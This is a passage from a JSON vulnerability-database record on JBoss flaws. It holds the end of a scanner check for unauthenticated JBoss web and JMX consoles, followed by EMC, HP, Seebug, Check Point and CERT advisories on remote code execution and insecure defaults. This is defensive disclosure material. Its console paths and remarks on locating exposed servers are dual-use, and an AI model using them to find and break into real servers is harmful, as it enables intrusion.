If the user did not use the\n installer, the raw JBoss services will be in a completely unconfigured state and these steps should be performed\n manually. See the referenced advisories for mitigation steps.\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/632656/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/460597/100/0/threaded\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + \"/web-console/ServerInfo.jsp\";\n\nif (http_vuln_check(port: port, url: url, pattern: \"<title>JBoss Management Console - Server Information</title>\",\n check_header: TRUE, extra_check: \"Management Console\")) {\n report = 'It was possible to access the JBoss Web Console at ' +\n http_report_vuln_url(port: port, url: url, url_only: TRUE);\n}\n\nurl = dir + \"/jmx-console/\";\n\nif (http_vuln_check(port: port, url: url, pattern: \"<title>JBoss JMX Management Console\",\n check_header: TRUE)) {\n report += '\\n\\nIt was possible to access the JBoss JMX Management Console at ' +\n http_report_vuln_url(port: port, url: url, url_only: TRUE);\n}\n\nif (report) {\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T17:46:48", "description": "Bugtraq ID:57552\r\nCVE ID:CVE-2012-0874\r\n\r\nJBOSS is an open source application server based on J2EE.\r\nUnder certain configurations, unauthenticated access to the JMXInvokerHAServlet and EJBInvokerHAServlet invoker 
servlets is allowed. A second layer of authentication in the security interceptor prevents direct exploitation of this vulnerability, but if the interceptor is misconfigured or incorrectly disabled, arbitrary code execution can result.\r\n0\r\nRed Hat JBoss Enterprise Web Platform for RHEL 5 Server 5\r\nRed Hat JBoss Enterprise Web Platform for RHEL 4ES 5\r\nRed Hat JBoss Enterprise Web Platform for RHEL 4AS 5\r\nRed Hat JBoss Enterprise Application Platform for RHEL 5 Server 5\r\nRed Hat JBoss Enterprise Application Platform for RHEL 4ES 5\r\nRed Hat JBoss Enterprise Application Platform for RHEL 4AS 5\r\nVendor solution\r\n\r\nUsers can refer to the following vendor security advisory for patch information:\r\nhttp://rhn.redhat.com/errata/RHSA-2013-0194.html", "cvss3": {}, "published": "2013-02-03T00:00:00", "title": "JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities (CVE-2012-0874)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0874"], "modified": "2013-02-03T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60624", "id": "SSV:60624", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:24:13", "description": "A remote code execution vulnerability exists in JBoss Enterprise Application Platform. 
A remote attacker can exploit this vulnerability to execute arbitrary code in the targeted system.", "cvss3": {}, "published": "2019-01-29T00:00:00", "type": "checkpoint_advisories", "title": "JBoss Enterprise Application Platform Invoker Servlets Remote Code Execution (CVE-2012-0874)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0874"], "modified": "2019-01-29T00:00:00", "id": "CPAI-2019-0078", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:54", "description": "Code execution.", "edition": 1, "cvss3": {}, "published": "2014-01-08T00:00:00", "title": "EMC Data Protection Advisor / Connectrix Manager security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-0874"], "modified": "2014-01-08T00:00:00", "id": "SECURITYVULNS:VULN:13495", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13495", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:50", "description": "\r\n\r\n\r\n\r\nESA-2013-094.txt\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nESA-2013-094: EMC Data Protection Advisor JBOSS Remote Code Execution Vulnerability\r\n\r\nEMC Identifier: ESA-2013-094 \r\n\r\nCVE Identifier: CVE-2012-0874\r\n\r\nSeverity Rating: CVSS v2 Base Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n\r\n\r\nAffected products: \r\n\u2022\tAll EMC Data Protection Advisor (DPA) 
versions of 5.x\r\n\r\n\r\nSummary: \r\nEMC DPA may be vulnerable to remote code execution vulnerability.\r\n\r\n\r\nDetails: \r\nThe DPA Illuminator service (DPA_Illuminator.exe) listening on port 8090 (tcp/http) and 8453 (tcp/https) embeds JBOSS servlets (JMXInvokerServlet and EJBInvokerServlet). These JBOSS servlets are vulnerable to remote code execution vulnerability. The vulnerability could be exploited to execute remote code with NT AUTHORITY\SYSTEM privileges. See http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0874 for more details. \r\n\r\nAffected JBOSS servlets are not required for DPA functionality. This vulnerability does not affect EMC DPA versions 6.x. \r\n\r\n Follow the steps below to remove the vulnerable JBOSS servlets from DPA 5.x system and mitigate the security risk.\r\n\r\n\r\nResolution: \r\nThe following products contain the resolution to this issue:\r\n\u2022\tEMC DPA version 6.x and later.\r\n\r\nWorkaround for DPA 5.x versions: \r\n1.\tStop the DPA Illuminator service.\r\n2.\tOpen <Install dir>\Illuminator_Server\JBoss\server\illuminator\deploy. For example: C:\Program Files\EMC\DPA\Illuminator_Server\JBoss\server\illuminator\deploy\r\n3.\tDelete http-invoker.sar directory.\r\n4.\tStart the DPA Illuminator service.\r\n\r\nEMC strongly recommends all customers upgrade to version 6.x or higher or apply workaround for 5.x versions at the earliest opportunity.\r\n\r\n\r\nLink to remedies:\r\n\r\nRegistered EMC Online Support customers can download patches and software from support.emc.com at: https://support.emc.com/downloads/829_Data-Protection-Advisor\r\n \r\nCredits: \r\nEMC would like to thank Andrea Micalizzi (aka rgod) for discovering this issue. \r\n\r\n\r\nRead and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. 
If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867.\r\n\r\nFor an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.\r\n\r\nEMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. 
Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.\r\n\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (Cygwin)\r\n\r\niEYEARECAAYFAlKzP2AACgkQtjd2rKp+ALxoNACgtBXByJQv59K6/7EynNjxA9DQ\r\ntOwAoNl/PWIbRnLriOvbaIbcm/tICI5P\r\n=Jq4q\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "cvss3": {}, "published": "2014-01-08T00:00:00", "title": "ESA-2013-094: EMC Data Protection Advisor JBOSS Remote Code Execution Vulnerability", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-0874"], "modified": "2014-01-08T00:00:00", "id": "SECURITYVULNS:DOC:30174", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30174", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:23", "description": "Web console and management instruments are available without authentication.", "edition": 1, "cvss3": {}, "published": "2007-02-23T00:00:00", "title": "JBoss insecure defaults", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2007-1156", "CVE-2007-1036", "CVE-2007-1157"], "modified": "2007-02-23T00:00:00", "id": "SECURITYVULNS:VULN:7280", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7280", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:10:16", "description": "Cross-site scripting, code execution.", "edition": 2, "cvss3": {}, "published": "2014-01-08T00:00:00", "title": "HP ProCurve Manager multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2005-2572", "CVE-2013-4810", "CVE-2013-4811", "CVE-2013-4809", "CVE-2013-4813", "CVE-2013-4812"], "modified": "2014-01-08T00:00:00", "id": "SECURITYVULNS:VULN:13501", "href": 
"https://vulners.com/securityvulns/SECURITYVULNS:VULN:13501", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:58:44", "description": "Code execution, session reusage, SQL injection.", "edition": 2, "cvss3": {}, "published": "2013-09-11T00:00:00", "title": "HP ProCurve Manager, HP Identity Driven Manager multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2005-2572", "CVE-2013-4810", "CVE-2013-4811", "CVE-2013-4809", "CVE-2013-4813", "CVE-2013-4812"], "modified": "2013-09-11T00:00:00", "id": "SECURITYVULNS:VULN:13282", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13282", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:50", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03897409\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03897409\r\nVersion: 2\r\n\r\nHPSBPV02918 rev.2 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven\r\nManager (IDM), SQL Injection, Remote Code Execution, Session Reuse\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2013-10-15\r\nLast Updated: 2013-10-15\r\n\r\nPotential Security Impact: SQL injection, remote code execution, session\r\nreuse\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP ProCurve\r\nManager (PCM), HP PCM+ and HP Identity Driven Manager (IDM). 
These\r\nvulnerabilities could be exploited remotely to allow SQL injection, remote\r\ncode execution and session reuse.\r\n\r\nReferences: CVE-2005-2572 (SSRT101272)\r\nCVE-2013-4809 (ZDI-CAN-1744, SSRT101132)\r\nCVE-2013-4810 (ZDI-CAN-1760, SSRT101127)\r\nCVE-2013-4811 (ZDI-CAN-1743, SSRT101116)\r\nCVE-2013-4812 (ZDI-CAN-1742, SSRT101115)\r\nCVE-2013-4813 (ZDI-CAN-1745, SSRT101129)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP ProCurve Manager (PCM) v3.x, v3.20, v4.0\r\nHP PCM+ v3.20, v4.0\r\nHP Identity Driven Manager (IDM) v4.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2013-4809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4810 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4811 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4812 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4813 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2005-2572 (AV:N/AC:M/Au:S/C:C/I:C/A:C) 8.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Andrea Micalizzi aka rgod for working with\r\nHP's Zero Day Initiative to report CVE-2013-4809, CVE-2013-4810,\r\nCVE-2013-4811, CVE-2013-4812 and CVE-2013-4813 to security-alert@hp.com\r\n\r\nRESOLUTION\r\n\r\nHP has provided updated software to resolve these issues. Please use the\r\nAutoUpdate feature of PCM.\r\n\r\nNote about CVE-2005-2572 and PCM v3.X: To address CVE-2005-2572 on PCMv3, a\r\nseparate security tool must be run. This security tool can be found as\r\nfollows. 
Browse to the HP Networking Support Lookup Tool\r\nhttp://www.hp.com/networking/support :\r\n\r\nEnter a PCM v3.x product number, such as J9173A, J9174A, J9175A, or J9176A\r\ninto the "Auto Search" text box\r\nCheck the appropriate product\r\nPress "Display Selected"\r\nClick "Software Downloads"\r\nIn the "Other" section, there will be a "Security Tools" download which\r\ncontains a zip file with several executables.\r\nTo protect your PCM v3.x installation, use the pcm320-DB-restrict tool. There\r\nare 32bit and 64bit versions available. Please read the release notes\r\nincluded in the Security Tool download.\r\nIMPORTANT: If you will be updating a protected PCM v3 installation to PCM v4,\r\nyou will need to run the pcm320-DB-unrestrict utility prior to updating.\r\n\r\nProduct and Potential Vulnerability\r\n Resolution\r\n HP Branded Products Impacted\r\n\r\nHP IDM v4.00 (CVE-2013-4809, CVE-2013-4810, CVE-2013-4811, CVE-2013-4812)\r\n HP PCM v4.00 AutoUpdate #6 04.00.06.628\r\n J9752A HP PCM+ Identity Driven Manager v4 Software Module with 500-user\r\nLicense\r\n\r\nJ9753A HP PCM+ Identity Driven Manager v4 Software Module with Unlimited-user\r\nLicense\r\n\r\nHP PCM v3.20, HP PCM v4.00 (CVE-2013-4813)\r\n HP PCM v4.00 AutoUpdate #5 04.00.05.612\r\n\r\nHP PCM v3.20 AutoUpdate #8 C.03.20.1741\r\n J9755A HP PCM+ v4 Software Platform with 50-device License\r\n\r\nJ9757A HP PCM+ v4 Software Platform with Unlimited-device License\r\n\r\nJ9173A HP ProCurve Manager Plus 3.0 50 device license upgrade\r\n\r\nJ9174A HP ProCurve Manager Plus 3.0 software with 50 device license\r\n\r\nJ9176A HP ProCurve Manager Plus 3.0 unlimited device license upgrade\r\n\r\nJ9177A HP ProCurve Manager Plus 3.0 software with unlimited device license\r\n\r\nHP PCM v4.00 ( CVE-2005-2572)\r\n HP PCM v4.00 AutoUpdate #5 04.00.05.612\r\n J9755A HP PCM+ v4 Software Platform with 50-device License\r\n\r\nJ9757A HP PCM+ v4 Software Platform with Unlimited-device License\r\n\r\nHP PCM v3.x ( 
CVE-2005-2572)\r\n HP PCM v3.x see Resolution text above.\r\n J9173A HP ProCurve Manager Plus 3.0 50 device license upgrade\r\n\r\nJ9174A HP ProCurve Manager Plus 3.0 software with 50 device license\r\n\r\nJ9176A HP ProCurve Manager Plus 3.0 unlimited device license upgrade\r\n\r\nJ9177A HP ProCurve Manager Plus 3.0 software with unlimited device license\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 9 September 2013 Initial release\r\nVersion:2 (rev.2) - 15 October 2013 Added PCM v3\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2013 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial 
errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlJdvz4ACgkQ4B86/C0qfVmLhwCghN6a1Opqqcbd3dLqlnnfQWci\r\nUR8AoIhyX+Ht4By5+4v503IdvTZKcaWg\r\n=3nFW\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "cvss3": {}, "published": "2014-01-08T00:00:00", "title": "[security bulletin] HPSBPV02918 rev.2 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven Manager (IDM), SQL Injection, Remote Code Execution, Session Reuse", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2005-2572", "CVE-2013-4810", "CVE-2013-4811", "CVE-2013-4809", "CVE-2013-4813", "CVE-2013-4812"], "modified": "2014-01-08T00:00:00", "id": "SECURITYVULNS:DOC:30182", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30182", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:49", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03897409\r\n\r\nSUPPORT COMMUNICATION - 
SECURITY BULLETIN\r\n\r\nDocument ID: c03897409\r\nVersion: 1\r\n\r\nHPSBPV02918 rev.1 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven\r\nManager (IDM), SQL Injection, Remote Code Execution, Session Reuse\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2013-09-09\r\nLast Updated: 2013-09-09\r\n\r\nPotential Security Impact: SQL injection, remote code execution, session\r\nreuse\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP ProCurve\r\nManager (PCM), HP PCM+ and HP Identity Driven Manager (IDM). These\r\nvulnerabilities could be exploited remotely to allow SQL injection, remote\r\ncode execution and session reuse.\r\n\r\nReferences: CVE-2005-2572 (SSRT101272)\r\nCVE-2013-4809 (ZDI-CAN-1744, SSRT101132)\r\nCVE-2013-4810 (ZDI-CAN-1760, SSRT101127)\r\nCVE-2013-4811 (ZDI-CAN-1743, SSRT101116)\r\nCVE-2013-4812 (ZDI-CAN-1742, SSRT101115)\r\nCVE-2013-4813 (ZDI-CAN-1745, SSRT101129)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP ProCurve Manager (PCM) v3.20, v4.0\r\nHP PCM+ v3.20, v4.0\r\nHP Identity Driven Manager (IDM) v4.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2013-4809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4810 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4811 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4812 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2013-4813 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2005-2572 (AV:N/AC:M/Au:S/C:C/I:C/A:C) 8.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Andrea Micalizzi aka rgod for working with\r\nHP's Zero Day Initiative to report CVE-2013-4809, 
CVE-2013-4810,\r\nCVE-2013-4811, CVE-2013-4812 and CVE-2013-4813 to security-alert@hp.com\r\n\r\nRESOLUTION\r\n\r\nHP has provided updated software to resolve these issues. Please use the\r\nAutoUpdate feature of PCM. Product and Potential Vulnerability\r\n Resolution\r\n HP Branded Products Impacted\r\n\r\nHP IDM v4.00 (CVE-2013-4809, CVE-2013-4810, CVE-2013-4811, CVE-2013-4812)\r\n HP PCM v4.00 AutoUpdate #6 04.00.06.628\r\n J9752A HP PCM+ Identity Driven Manager v4 Software Module with 500-user\r\nLicense\r\n\r\nJ9753A HP PCM+ Identity Driven Manager v4 Software Module with Unlimited-user\r\nLicense\r\n\r\nHP PCM v3.20, HP PCM v4.00 (CVE-2013-4813)\r\n HP PCM v4.00 AutoUpdate #5 04.00.05.612\r\n\r\nHP PCM v3.20 AutoUpdate #8 C.03.20.1741\r\n J9755A HP PCM+ v4 Software Platform with 50-device License\r\n\r\nJ9757A HP PCM+ v4 Software Platform with Unlimited-device License\r\n\r\nJ9173A HP ProCurve Manager Plus 3.0 50 device license upgrade\r\n\r\nJ9174A HP ProCurve Manager Plus 3.0 software with 50 device license\r\n\r\nJ9176A HP ProCurve Manager Plus 3.0 unlimited device license upgrade\r\n\r\nJ9177A HP ProCurve Manager Plus 3.0 software with unlimited device license\r\n\r\nHP PCM v4.00 ( CVE-2005-2572)\r\n HP PCM v4.00 AutoUpdate #5 04.00.05.612\r\n J9755A HP PCM+ v4 Software Platform with 50-device License\r\n\r\nJ9757A HP PCM+ v4 Software Platform with Unlimited-device License\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 9 September 2013 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2013 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlIuBgcACgkQ4B86/C0qfVlvcwCggBleIQ2jJ5kVsOs0jnnfN0nJ\r\njqkAnjs4Po+SPJx4rm+WXolFai2juOmy\r\n=5yU4\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2013-09-11T00:00:00", "title": "[security bulletin] HPSBPV02918 rev.1 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven Manager (IDM), SQL Injection, Remote Code Execution, Session Reuse", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2005-2572", "CVE-2013-4810", "CVE-2013-4811", "CVE-2013-4809", "CVE-2013-4813", "CVE-2013-4812"], "modified": "2013-09-11T00:00:00", "id": "SECURITYVULNS:DOC:29808", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29808", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2021-09-28T17:51:47", "description": "### Overview\n\nThe JBoss Application Server may allow unauthenticated, remote access to the administrative console.\n\n### Description\n\n[JBoss](<http://www.jboss.com/>) is an open source application server implemented in Java. Because it is Java-based, JBoss can be used on any operating system that supports Java. JBoss servers can be remotely managed through a web-based administrative interface.\n\nIf JBoss is installed without using the advanced installer options, the JBoss [security features](<http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBoss>) will need to be configured manually. If a JBoss server is configured to allow unauthenticated access to the administrative interface, and is accessible from a remote network, then an attacker may be able to access and modify data on the server. \n \nNote that it may be possible to enumerate vulnerable servers by using search engines. 
\n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker may be able to gain administrative access to a JBoss Application Server. Once an attacker has access, they may be able to access and modify data on that server. \n \n--- \n \n### Solution\n\n**Use the installer** \nUsing the advanced installer options will configure JBoss to only allow authenticated administrative access. \n \n--- \n \n \n**Enable role based security** \n \nEnabling role based security may mitigate this vulnerability. See the [SecureTheJmxConsole](<http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureTheJmxConsole>) page on the JBoss wiki for more information. \n \n**Restrict access** \n \nRestricting access to the administrative interface to trusted hosts may mitigate this vulnerability. See the [LimitAccessToCertainClients](<http://wiki.jboss.org/wiki/Wiki.jsp?page=LimitAccessToCertainClients>) page on the JBoss wiki for more information. \n \n--- \n \n### Vendor Information\n\n632656\n\n### Red Hat, Inc. __ Affected\n\nUpdated: February 21, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe JBoss AS console manager should always be secured prior to deployment, as directed in the JBoss Application Server Guide and release notes. By default, the JBoss AS installer gives users the ability to password protect the console manager. 
If the user did not use the installer, the raw JBoss services will be in a completely unconfigured state and these steps should be performed manually:\n\n<http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBoss>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n * <http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureTheJmxConsole>\n * <http://wiki.jboss.org/wiki/Wiki.jsp?page=LimitAccessToCertainClients>\n * <http://www.jboss.com/>\n * <http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBoss>\n * <http://archives.neohapsis.com/archives/bugtraq/2007-02/0347.html>\n\n### Acknowledgements\n\nThis vulnerability was reported by Ben Dexter.\n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-1036](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-1036>) \n---|--- \n**Severity Metric:** | 2.25 \n**Date Public:** | 2007-02-20 \n**Date First Published:** | 2007-02-20 \n**Date Last Updated: ** | 2007-02-21 22:50 UTC \n**Document Revision: ** | 32 \n", "cvss3": {}, "published": "2007-02-20T00:00:00", "type": "cert", "title": "JBoss Application Server may not properly restrict access to the administrative interface", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 